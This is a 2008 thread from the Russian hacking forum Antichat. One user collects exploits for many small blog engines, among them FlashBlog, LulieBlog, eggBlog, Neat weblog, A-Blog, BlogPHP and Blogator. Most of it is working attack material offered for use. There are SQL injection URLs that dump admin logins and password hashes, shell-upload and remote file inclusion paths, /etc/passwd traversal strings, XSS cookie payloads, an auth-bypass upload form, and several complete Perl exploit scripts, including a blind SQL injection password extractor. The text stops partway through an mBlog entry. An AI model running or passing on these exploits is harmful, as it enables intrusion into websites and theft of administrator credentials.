Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
[ Обзор уязвимостей в блогах (кроме WР) ] |
09.06.2008, 05:21
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
[ Обзор уязвимостей в блогах (кроме WР) ]
Раздел называется "Движки CMS и блоги", а вот обзора по блогам, кроме Word Press, я не увидел, будем исправлять)))
FlashBlog beta0.31 Remote File Upload
Заливаем шелл здесь:
http://[site.com]/admin/Editor/imgupload.php
Просматриваем здесь:
http://[site.com]/tus_imagenes/shell.php
FlashBlog SQL Injection
Код:
http://[host]/[path]//php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17/**/from/**/usuarios/*
Archangel Weblog 0.90.02 Admin Auth Bypass, Upload File, Blind SQL Injection
PHP код:
#!/usr/bin/perl -w
# Portal : Archangel Weblog 0.90.02
# Download : http://www.archangelmgt.com/Archangel_Weblog_v090_02.zip
# exploit aported password crypted
# mgharba :d:d:d:d
########################################
#[*] Founded & Exploited by : Stack-Terrorist [v40]
#[*] Contact: Ev!L =>> see down
#[*] Greetz : Houssamix & Djekmani & Jadi & iuoisn & Str0ke & All muslims HaCkeRs :)
########################################
#----------------------------------------------------------------------------#
########################################
# * TITLE: PerlSploit Class
# * REQUIREMENTS: PHP 4 / PHP 5
# * VERSION: v.1
# * LICENSE: GNU General Public License
# * ORIGINAL URL: http://www.v4-Team/v4.txt
# * FILENAME: PerlSploitClass.pl
# *
# * CONTACT: dj-moad@hotmail.fr (french / english / arabic / moroco Darija :d )
# * THNX : AllaH
# * GREETZ: Houssamix & Djekmani
########################################
#----------------------------------------------------------------------------#
########################################
system("color a");
print "\t\t############################################################\n\n";
print "\t\t# Archangel Weblog <= 0.90.02 - Remote SQL Inj Exploit #\n\n";
print "\t\t# by Stack-Terrorist [v40] #\n\n";
print "\t\t############################################################\n\n";
########################################
#----------------------------------------------------------------------------#
########################################
use LWP::UserAgent;
die "Example: perl $0 http://victim.com/path/\n" unless @ARGV;
system("color f");
########################################
#----------------------------------------------------------------------------#
########################################
#the username of news manages
$user="author_login";
#the pasword of news manages
$pass="author_password";
#the tables of news manages
$tab="authors";
########################################
#----------------------------------------------------------------------------#
########################################
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
########################################
#----------------------------------------------------------------------------#
########################################
$host = $ARGV[0] . "/index.php?post_id=-1'/**/union/**/select/**/12,concat(CHAR(60,117,115,101,114,62),".$user.",CHAR(60,117,115,101,114,62),".$pass."),32,4,5,6,3/**/from/**/".$tab."/**/where/**/author_id=1/*";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
########################################
#----------------------------------------------------------------------------#
########################################
if ($answer =~ /<user>(.*?)<user>/){
print "\nBrought to you by v4-team.com...\n";
print "\n[+] Admin User : $1";
}
########################################
#----------------------------------------------------------------------------#
########################################
if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n\n";
print "\t\t# Exploit has ben aported user and password hash #\n\n";}
else{print "\n[-] Exploit Failed...\n";}
########################################
#-------------------Exploit exploited by Stack-Terrorist --------------------#
########################################
miniBloggie 1.0 Delete Post
PHP код:
if (isset($_GET['post_id'])) $post_id = $_GET['post_id'];
if (isset($_GET['confirm'])) $confirm = $_GET['confirm'];
[...]
elseif ($confirm=="yes") {
[...]
$sql = "DELETE FROM blogdata WHERE post_id=$post_id";
$query = mysql_query($sql) or die("Cannot query the database.<br>" . mysql_error());
Vulner:
http://site/del.php?post_id=[postid]&confirm=yes
Example:
http://127.0.0.1/del.php?post_id=1&confirm=yes
Smartblog SQL Injection
Код:
http://localhost/[script_path]/index.php?idt=-1 UNION SELECT 1,concat_ws(0x3a,pseudo,pass),3,4,5,6,7,8,9 FROM smb_user--
BlogMe PHP SQL Injection
Код:
http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,3,4,5,6,aes_decrypt(aes_encrypt(user(),0x71),0x71)--
BlogWorx 1.0 SQL Injection
Код:
http://www.example.com/lab/blogworx1.0/view.asp?id=1+union+select+0,1,2,Password,UserName,5,6+from+Users
Blog PixelMotion SQL Injection
Код:
http://www.xxx.org/blog/index.php?categorie=-1+union+select+0,1,2,database(),4,5,6/*
Blog PixelMotion File Upload
Заливаем шелл сюда:
http://[Site]/[script]/admin/modif_config.php
Получаем здесь:
http://[Site]/[script]/templateZip/[shell]
Blog PixelMotion Database Backup
http://[Site]/[script]/admin/sauvBase.php
Таблица мемберов называется blog_utilisateurs
LulieBlog 1.2 Admin Auth Bypass, Upload File, Blind SQL Injection
PHP код:
# LulieBlog 1.2 Multiple Remote Vulnerabilities (Admin Auth Bypass, Upload File, Blind SQL Injection)
# Author: Cod3rZ
# Site: http://cod3rz.helloweb.eu
# Site: http://devilsnight.altervista.org
# Date: 06/05/2008 [dd/mm/yyyy]
# Admin Auth Bypass:
# Modify Articles: send a request to site/Admin/article_modif2.php with:
# titre=[titlearticle]&text=[text]&media=[media]&id=[idarticle]
# New Article: send a request to site/Admin/article_suppr.php with:
# titre=[titlearticle]&text=[text]&media=[media]
# Change Admin Username & Blog Title: send a request to site/Admin/util_modif.php with:
# pseudo=[newadminnick]&titre=[newblogtitle]
# Change Admin Email: send a request to site/Admin/mails_modif.php with:
# recevmail=1&emetteur=[email]&desti=[email]
# PS: All administration variables are vulnerables!
# Upload File (Simple Exploit):
<html>
<head><title>LulieBlog Uploader - http://cod3rz.helloweb.eu</title></head>
<body bgcolor='#000000' text='#FFFFFF'>
<form name='cod3rz' action='site/Admin/media_insert.php' method='post' enctype='multipart/form-data'>
<font size='1' face='Verdana'>
<center>
Title:<br>
<input type='text' name='titre'><br>
File:<br>
<input type='file' name='fichier'><br>
<input type='hidden' name='lieu' value='0'>
Type File:<br> <select name='typemedia'>
<option value='1'>Image</option>
<option value='2'>Flash</option>
<option value='3'>Archive</option>
<option value='4'>Vid</option>
<option value='6'>Présentation PowerPoint</option>
<option value='7'>Fichiers PDF</option>
</select><br>
<input type='submit' name ='upload' value='Upload'></font></center>
</form></body></html>
# End
# Blind SQL Injection Exploit:
#!/usr/bin/perl
# LulieBlog 1.2 Remote Blind SQL Injection Exploit
# Author : Cod3rZ
# Site : http://cod3rz.helloweb.eu
# Site : http://devilsnight.altervista.org
# Usage : perl lb.pl site
use LWP::UserAgent;
use HTTP::Request::Common;
use Time::HiRes;
$ua = LWP::UserAgent->new;
$site = "http://127.0.0.1/blog";
if(!$site) { &usage; }
@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
sub usage {
print " Usage: perl ig.pl site \n";
print " Ex.: perl ig.pl http://127.0.0.1 \n";
}
sub request {
$var = $_[0];
$start = Time::HiRes::time();
$response = $ua->request(GET $var,s => $var);
$response->is_success() || print("$!\n");
$end = Time::HiRes::time();
$time = $end - $start;
return $time
}
sub refresh{
system("cls");
print " -------------------------------------------------\n";
print " LulieBlog 1.2 Remote Blind Sql Injection Exploit \n";
print " Powered by Cod3rZ \n";
print " http://cod3rz.helloweb.eu \n";
print " -------------------------------------------------\n";
print " Please Wait.. \n";
print " Hash : " . $_[3] . " \n";
print " -------------------------------------------------\n";
}
for ($i = 1; $i < 33; $i++)
{
for ($j = 0; $j < 16; $j++)
{
$var = $site."/visumedia.php?id=-1' OR (SELECT IF((ASCII(SUBSTRING(`valeur_parametre`,".$i.",1))=".$array[$j]."),benchmark(200000000,CHAR(0)),0) FROM lulieblog_parametres WHERE nom_parametre='pass')/*";
system('pause');
$time = request($var);
refresh($host,$timedefault,$j,$hash,$time,$i);
if($time > 4)
{
$time = request($var);
refresh($host,$timedefault,$j,$hash,$time,$i);
$hash .= chr($array[$j]);
refresh($host,$timedefault,$j,$hash,$time,$i);
$j=200;
}}
if($i == 1 && !$hash)
{
print " Failed \n";
print " -------------------------------------------------\n";
die();
}
if($i == 32) {
print " Exploit Terminated \n";
print " -------------------------------------------------\n ";
system('pause');
}}
# http://cod3rz.helloweb.eu
Battle Blog <= 1.25 SQL Injection
Для MS SQL Server:
/comment.asp?entry=22+and+1=convert(int,(select+@@v ersion))--
Для Ms ACCESS:
/comment.asp?entry=IIF((select%20mid(last(Name),1,1 )%20from%20(select%20top%2010%20Namee%20from%20MSy sObjects))='a',0,'done')%00
Blogator-script 0.95 Change User Password
Уязвимый код:
PHP код:
line 23: $id=$_GET['a'];
line 24:$email=$_GET['b'];
line 25: $mdp=$_GET['c'];
.....
line 27: $sql_change_pass=mysql_query("UPDATE membre SET pass = '$mdp' WHERE id_membre = '$id' AND email LIKE '$email' LIMIT 1");
Код:
http://www.site.com/_blogadata/include/init_pass2.php?c=[newpass]&a=[user id]&b=%
Blogator-script 0.95 SQL Injection
Уязвимый код:
PHP код:
line 27: $id_art=$_GET['id_art'];
......
line 34: $sql_res=mysql_query("SELECT sond_rep, votes_H, votes_F FROM sondage_rep WHERE id_sond = $id_art ORDER BY ordre");
Код:
http://www.site.com/_blogadata/include/sond_result.php?id_art=-99999/**/union/**/select/**/concat(pseudo,0x3a,pass,char(58),email),2,3/**/from/**/membre/**/where/**/id_membre=1/*
Blogator-script 0.95 File Inclusion
http://localhost/[script]/_blogadata/include/struct_admin.php?incl_page=http://localhost/shell.txt?
http://localhost/[script]/_blogadata/include/struct_admin_blog.php?incl_page=http://localhost/shell.txt?
http://localhost/[script]/_blogadata/include/struct_main.php?incl_page=http://localhost/shell.txt?
eggBlog 4.0 SQL Injection
PHP код:
# Author: __GiReX__
# mySite: girex.altervista.org
# Date: 27/03/2008 - 1/04/2008 Added exploit for str0ke
# CMS: eggBlog 4.0
# Site: eggblog.net
# Bug: SQL Injection (cookie vars)
# Type: 1 - Admin/User Authentication Bypass
# Bug2: Blind SQL Injection (same vars-query)
# Type: Password retrieve exploit
# Var : $_COOKIE['email], $_COOKIE['password']
# Need: magic_quotes_gpc = Off
# File: index.php
require_once "_lib/global.php";
...
eb_pre();
# File: /_lib/globals.php
require_once '_lib/user.php';
...
function eb_pre() {
...
if(isset($_COOKIE['email']) && isset($_COOKIE['password']) && !isset($_SESSION['user_id'])) eb_login($_COOKIE['email'],$_COOKIE['password'],1);
# Let we see function eb_login
# File: /_lib/user.php
function eb_login($email,$password,$key) {
...
if($key==0) $password=md5($password);
# Our $key is set to 1 so the password will not cprypted
$sql="SELECT user_id FROM eb_users WHERE user_email=\"".$email."\" AND md5(user_password)=\"".$password."\"";
$query=mysql_query($sql);
# I have no words, 2 vars not sanizated into a SELECT query
PoC 1:
GET [PATH]/index.php HTTP/1.1
Host: [HOST]
...
Cookie: email=@" OR "1; password=@" OR "1
# With this you will be authenticated with the fist record of table eb_user
PoC 2:
GET [PATH]/index.php HTTP/1.1
Host: [HOST]
...
Cookie: email=@" OR "1; password=@" OR "1" AND user_id="[VICTIM_USER_ID]
# For anybody you want
##############################################################################################################
# Start Blind SQL Injection / Password retrieve exploit #
# NOTE: Password is in plain-text so take a coffe... #
##############################################################################################################
#!/usr/bin/perl -w
# EggBlog v4.0 Blind SQL Injection
# Password Retrieve Exploit
# Coded by __GiReX__
use LWP::UserAgent;
use HTTP::Request;
if(not defined $ARGV[0])
{
print "usage: perl $0 [host] [path]\n";
print "example: perl $0 localhost /eggblog/\n";
exit;
}
my $client = new LWP::UserAgent;
my @cset = (32..126, 0);
my ($i, $j, $hash) = (0, 1, undef);
my $host = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0]: 'http://' . $ARGV[0];
$host .= $ARGV[1] unless not defined $ARGV[1];
banner();
check_vuln($host) or die "[-] Site not vulnerable\n";
while($i != $#cset)
{
for($i = 0; $i <= $#cset; $i++)
{
my ($pre_time, $post_time) = time();
$rv = check_char($host, $cset[$i], $j);
$post_time = time();
info(chr($cset[$i]), $post_time - $pre_time, $hash);
if($post_time - $pre_time > 3 and $rv)
{
$hash .= chr($cset[$i]);
last;
}
}
$j++;
}
print "\n". (defined $hash) ?
"[+] Admin password: ${hash} \n":
"[-] Exploit mistake: please check benchmark and charset\n";
print "[+] Exploit terminated\n\n";
sub banner
{
print "\n";
print "[+] EggBlog v4.0 Blind SQL Injection\n";
print "[+] Password Retrieve Exploit\n";
print "[+] Coded by __GiReX__\n";
print "\n";
}
sub check_vuln
{
my ($target, $res) = @_;
$get = new HTTP::Request(GET, $target);
$get->header('Cookie' => 'email=-1" WHERE X#; password=aaaaaaa;');
$res = $client->request($get);
if($res->is_success)
{
return 1 if $res->content =~ /<b>Warning<\/b>:/;
}
return 0;
}
sub check_char
{
my ($target, $char, $n, $res) = @_;
$get->header(Cookie =>
'email=-1"+AND+'.
'CASE+WHEN'.
'((SELECT(ASCII(SUBSTRING(user_password,'.$n.',1)))FROM+eb_users+WHERE+user_id=1)='.$char.')'.
'THEN+benchmark(90000000,CHAR(0))+'.
'END#; '.
'password=dummy_psw');
$res = $client->request($get);
return $res->is_success;
}
sub info
{
my ($char, $delay, $hash) = @_;
print STDOUT "[+] Admin password: ${hash}".$char."\r" unless not defined $hash;
# print STDOUT "[+] Char: ${char} - Delay: ${delay}\r";
$| = 1;
}
# milw0rm.com [2008-04-01]
З.Ы. Буду постепенно добавлять уязвимости.... |
|
|
09.06.2008, 05:33
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
Neat weblog 0.2 SQL Injection
PHP код:
#!/usr/bin/perl
#####################################################################################
#### Neat weblog 0.2 ####
#### SQL Injection Exploit ####
#####################################################################################
# #
#Discovered by : IRCRASH (Dr.Crash) #
#Exploited By : Dr.Crash #
#IRCRASH Team Members : Dr.Crash - Malc0de - R3d.w0rm #
# #
#####################################################################################
# #
#Script Download : http://kent.dl.sourceforge.net/sourceforge/neat-web/neat0.2.zip #
# #
#####################################################################################
# < SQL > #
#SQL Address : http://Sitename/index.php?action=show&articleId=99999%27union/**/select/**/0,concat(user,0x120,password),2,3,4,5,6,7,8/**/from/**/neat_users/**/where+id=1/*
# #
#####################################################################################
# Our site : Http://IRCRASH.COM #
#####################################################################################
use LWP;
use HTTP::Request;
use Getopt::Long;
sub header
{
print "
****************************************************
* Neat weblog 0.2 Sql Injection exploit *
****************************************************
*AUTHOR : IRCRASH *
*Discovered by : IRCRASH (Dr.Crash) *
*Our Site : IRCRASH.COM *
****************************************************";
}
sub usage
{
print "
* Usage : perl $0 -url http://Sitename/
****************************************************
";
}
my %parameter = ();
GetOptions(\%parameter, "url=s");
$url = $parameter{"url"};
if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url."/";}
if($url !~ /http:\/\//){$url = "http://".$url;}
$vul = "/index.php?action=show&articleId=99999%27union/**/select/**/0,concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),2,3,4,5,6,7,8/**/from/**/neat_users/**/where+id=1/*";
sub Exploit()
{
$requestpage = $url.$vul;
print "Requesting Page is ".$url."\n";
my $req = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
$req->referer($url);
$req->referer("http://IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);
$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();
#Debug Modus delete # at beginning of next line
#print $content;
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/<enduser>/,$name);
$name = @name[0];
@password = split(/Password:/,$content);
$password = @password[1];
@password = split(/<endpass>/,$password);
$password = @password[0];
if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}
print "Username: ".$name."\n";
print "Password: " .$password."\n\n";
print "Crack Password And Login In : $url/index.php?action=login\n";
print "Enjoy My friend .....\n";
}
#Starting;
print "
****************************************************
* Neat weblog 0.2 Sql Injection exploit *
****************************************************
*AUTHOR : IRCRASH *
*Discovered by : IRCRASH (Dr.Crash) *
*Our Site : IRCRASH.COM *
****************************************************";
print "\n\nExploiting...\n";
Exploit();
# milw0rm.com [2008-03-31]
Lightblog 9.6 local file inclusion
Код:
http://localhost/LightBlog9.6/view_member.php?username=../../../../../../../../../../etc/passwd%00
Artmedic weblog local file inclusion
http://localhost/artmedic_weblog/index.php?ta=../../../../../../../../../../etc/passwd%00
http://localhost/artmedic_weblog/artmedic_print.php?date=../../../../../../../../../../etc/passwd%00
A-Blog V.2 (id) XSS / SQL Injection
PHP код:
#!/usr/bin/perl
#####################################################################################
#### A-Blog V.2 ####
#### Multiple Remote Vulnerabilities (SQL Injection Exploit/XSS) ####
#####################################################################################
# #
#AUTHOR : IRCRASH #
#Discovered by : Dr.Crash #
#Exploited By : Dr.Crash #
#IRCRASH Team Members : Dr.Crash - Malc0de - R3d.w0rm #
# #
#####################################################################################
# #
#Script Download : http://heanet.dl.sourceforge.net/sourceforge/a-blog/A-BlogV2.rar #
# #
#####################################################################################
# < XSS > #
#XSS Address : http://Sitename/search.php?words=<script>alert(document.cookie);</script>&submit=Go
# #
#####################################################################################
# < SQL > #
#SQL Address : http://Sitename/blog.php?view=news&id=9999%27union/**/select/**/CoNcAt(0x4c6f67696e3a,name,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)/**/from/**/site_administrators/*
# Help : See Username And Password In Site Title
# #
#####################################################################################
# Our site : Http://IRCRASH.COM #
#####################################################################################
use LWP;
use HTTP::Request;
use Getopt::Long;
sub header
{
print "
****************************************************
* A-Blog V.2 Sql Injection exploit *
****************************************************
*AUTHOR : IRCRASH *
*Discovered by : Dr.Crash *
*Exploited by : Dr.Crash *
*Our Site : IRCRASH.COM *
****************************************************";
}
sub usage
{
print "
* Usage : perl $0 -url http://Sitename/
****************************************************
";
}
my %parameter = ();
GetOptions(\%parameter, "url=s");
$url = $parameter{"url"};
if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url."/";}
if($url !~ /http:\/\//){$url = "http://".$url;}
$vul = "blog.php?view=news&id=9999%27union/**/select/**/CoNcAt(0x4c6f67696e3a,name,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)/**/from/**/site_administrators/*";
sub Exploit()
{
$requestpage = $url.$vul;
print "Requesting Page is ".$url."\n";
my $req = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
$req->referer($url);
$req->referer("http://IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);
$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();
#Debug Modus delete # at beginning of next line
#print $content;
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/<enduser>/,$name);
$name = @name[0];
@password = split(/Password:/,$content);
$password = @password[1];
@password = split(/<endpass>/,$password);
$password = @password[0];
if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}
print "Username: ".$name."\n";
print "Password: " .$password."\n\n";
print "Crack Password And Login In : $url/admin.php\n";
print "Enjoy My friend .....\n";
}
#Starting;
print "
****************************************************
* A-Blog V.2 Sql Injection exploit *
****************************************************
*AUTHOR : IRCRASH *
*Discovered by : Dr.Crash *
*Exploited by : Dr.Crash *
*Our Site : IRCRASH.COM *
****************************************************";
print "\n\nExploiting...\n";
Exploit();
# milw0rm.com [2008-02-03]
BlogPHP v.2 (id) XSS / SQL Injection
PHP код:
#!/usr/bin/perl
#####################################################################################
#### BlogPHP V.2 ####
#### Multiple Remote Vulnerabilities (SQL Injection Exploit/XSS) ####
#####################################################################################
# #
#AUTHOR : IRCRASH #
#Discovered by : Dr.Crash #
#Exploited By : Dr.Crash #
#IRCRASH Team Members : Dr.Crash - Malc0de - R3d.w0rm #
# #
#####################################################################################
# #
#Script Download : http://puzzle.dl.sourceforge.net/sourceforge/blogphpscript/BlogPHPv2.zip
# #
#####################################################################################
# < XSS > #
#XSS Address : http://Sitename/index.php?search=<script>alert(document.cookie);</script>
# #
#####################################################################################
# < SQL > #
#SQL Address : http://Sitename/index.php?act=page&id=999999999%27union/**/select/**/0,1,CoNcAt(0x4c6f67696e3a,username,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),3,4/**/from/**/blogphp_users/*
# #
#####################################################################################
# Our site : Http://IRCRASH.COM #
#####################################################################################
use LWP;
use HTTP::Request;
use Getopt::Long;
sub header
{
print "
****************************************************
* SBlogPHP v.2 Sql Injection exploit *
****************************************************
*AUTHOR : IRCRASH *
*Discovered by : Dr.Crash *
*Exploited by : Dr.Crash *
*Our Site : IRCRASH.COM *
****************************************************";
}
sub usage
{
print "
* Usage : perl $0 -url http://Sitename/
****************************************************
";
}
my %parameter = ();
GetOptions(\%parameter, "url=s");
$url = $parameter{"url"};
if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url."/";}
if($url !~ /http:\/\//){$url = "http://".$url;}
$vul = "/index.php?act=page&id=999999999%27union/**/select/**/0,1,CoNcAt(0x4c6f67696e3a,username,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),3,4/**/from/**/blogphp_users/*";
sub Exploit()
{
$requestpage = $url.$vul;
print "Requesting Page is ".$url."\n";
my $req = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("http://IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);
$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();
#Debug Modus delete # at beginning of next line
#print $content;
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/<enduser>/,$name);
$name = @name[0];
@password = split(/Password:/,$content);
$password = @password[1];
@password = split(/<endpass>/,$password);
$password = @password[0];
if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}
print "Username: ".$name."\n";
print "Password: " .$password."\n\n";
print "Crack Md5 Password And Login In : $url/login.html\n";
print "Enjoy My friend .....\n";
}
#Starting;
print "
****************************************************
* SBlogPHP v.2 Sql Injection exploit *
****************************************************
*AUTHOR : IRCRASH *
*Discovered by : Dr.Crash *
*Exploited by : Dr.Crash *
*Our Site : IRCRASH.COM *
****************************************************";
print "\n\nExploiting...\n";
Exploit();
# milw0rm.com [2008-02-02]
LightBlog 9.5 File Upload
Заливаем шелл:
http://localhost/light/cp_upload_image.php
Просматриваем:
http://localhost/light/images/shell.php
LulieBlog Version 1.02 Sql Injection
Код:
http://Sitename/voircom.php?id=-1%27union/**/select/**/0,concat(nom_parametre,0x3a,0x3a,valeur_parametre),2,3,4,5/**/from/**/lulieblog_parametres/*
Mooseguy Blog System 1.0 SQL Injection
Уязвимый код:
PHP код:
<?php
$month = $_GET['month'];
$result = mysql_query("SELECT * FROM blog WHERE posted='$month' ORDER BY id DESC") or die("HELP QUERY BROKEN");
...
Код:
http://[target]/[path]/blog.php?month='+union+select+1,2,3,4,5,concat_ws(0x3a,id,uname,upass),7,8+from+users/*
Blogcms 4.2.1b (SQL/XSS)
Код:
http://[server]/[installdir]/index.php?query=asd&blogid=1,1)+union+select+1,2,user(),database(),mname,6,7,8,9,10,11,mpassword,13,14,15+from+nucleus_member/*
http://[server]/[installdir]/photo/admin.php/"><script>alert('DSECRG_XSS')</script>
http://[server]/[installdir]/photo/index.php/"><script>alert('DSECRG_XSS')</script>
|
|
|
|
09.06.2008, 05:44
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
Eggblog <= 3.1.0 Cookies SQL Injection
PHP код:
#!/usr/bin/perl
use Tk;
use Tk::BrowseEntry;
use Tk::DialogBox;
use LWP::UserAgent;
$mw = new MainWindow(title => "UnderWHAT?!" );
$mw->geometry ( '420x343' ) ;
$mw->resizable(0,0);
$mw->Label(-text => '', -font => '{Verdana} 8',-foreground=>'red')->pack();
$mw->Label(-text => 'eggblog <= 3.1.0 Cookies Sql Injection', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack();
$mw->Label(-text => 'it will take about half an hour to get hashed password', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack();
$mw->Label(-text => 'you need magic_quotes_gpc turned off and mysql version higher that 4.1', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack();
$mw->Label(-text => '', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack();
$fleft = $mw->Frame()->pack ( -side => 'left', -anchor => 'ne') ;
$fright = $mw->Frame()->pack ( -side => 'left', -anchor => 'nw') ;
$url = 'http://test2.ru/eggblog/home/index.php';
$user_id = '1';
$prefix = 'eggblog_';
$table = 'users';
$column = 'user_password';
$report = '';
$group = 1;
$curr_user = 0;
$fleft->Label ( -text => 'Path to forum index: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$url) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fleft->Label ( -text => 'User ID: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$user_id) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fleft->Label ( -text => 'Database tables prefix: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$prefix) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fleft->Label ( -text => 'Returned hash: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$report) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fright->Label( -text => ' ')->pack();
$fright->Button(-text => 'Test blog vulnerability',
-relief => "groove",
-width => '30',
-font => '{Verdana} 8 bold',
-activeforeground => 'red',
-command => \&test_vuln
)->pack();
$fright->Button(-text => 'Get hash from database',
-relief => "groove",
-width => '30',
-font => '{Verdana} 8 bold',
-activeforeground => 'red',
-command => \&get_hash
)->pack();
$mw ->Label(-text => '', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fleft->Label(-text => '!', -font => '{Webdings} 22')->pack();
$fleft->Label(-text => 'eggblog 3.1.0', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fleft->Label(-text => 'cookie sql injection ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fleft->Label(-text => 'mysql char bruteforcing ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fleft->Label(-text => 'bug in auth function ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fleft->Label(-text => 'by gemaglabin and Elekt ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fleft->Label(-text => '( mafia of antichat.ru ) ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fleft->Label(-text => ' 2007.02.04 ( fixed ) ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fright->Label(-text => '', -font => '{Verdana} 3 bold',-foreground=>'red')->pack();
$print=$fright->Text(-width=>35,-height=>5,-wrap=>"word")->pack(-side=>"top",-anchor=>"s");
MainLoop();
sub get_hash()
{
srand();
$xpl = LWP::UserAgent->new( ) or die;
$InfoWindow=$mw->DialogBox(-title => 'get hash from database', -buttons => ["OK"]);
$i = 1;
$b = 0;
$report = '';
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
$print->insert('end',"- Start [$hour:$min:$sec]\n");
my @brutearray=qw(48 49 50 51 52 53 54 55 56 57 58 97 98 99 100 101 102);
while (length($report)<32)
{
$num = $brutearray[$b];
$ret = get_pchar();
if($ret > 0)
{
$print->insert('end',"- char [$num] = ".chr($num)."\n");
$report .= chr($num);
$b = 0;
$i = $i +1;
$mw->update();
break;
}
else
{
$b = $b +1;
}
}
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
$print->insert('end',"- Finish [$hour:$min:$sec]");
}
sub get_pchar()
{
$res = $xpl->get($url,'Cookie'=>"eggblogemail=%;eggblogpassword=' or 1=if(ascii(substring((select password from ".$prefix."members where id=$user_id),$i,1))=$num,1,(select 1 union select 2))/*");
if($res->as_string =~ /MySQL/i) { return 0;}
else {return 1;}
}
sub test_vuln()
{
$xpl = LWP::UserAgent->new( ) or die;
$res = $xpl->get($url,'Cookie'=>"eggblogemail=%;eggblogpassword='");
if($res->is_success)
{
$rep = '';
if($res->as_string =~ /MySQL/i)
{
$print->insert('end',"- BLOG VULNERABLE\n");
}
else { $print->insert('end',"- BLOG UNVULNERABLE\n");}
}
}
# milw0rm.com [2008-01-07]
zBlog v1.2 SQL Injection
Код:
http://www.xxx.org/zblog/index.php?page=categ&categ=-1%20union%20select%201,pseudo_admin,motdepasse_admin,4,5,6,7,8,9,10,11,12,13,14,15,16,email_admin%20from%20zblog_admins--
mBlog 1.2 Remote File Disclosure
Уязвимый код:
PHP код:
./includes/tpl.php, 41-56:
...
41 // load_tpl
42 // loding a template file into a varible.
43 // use quick_tpl to display template
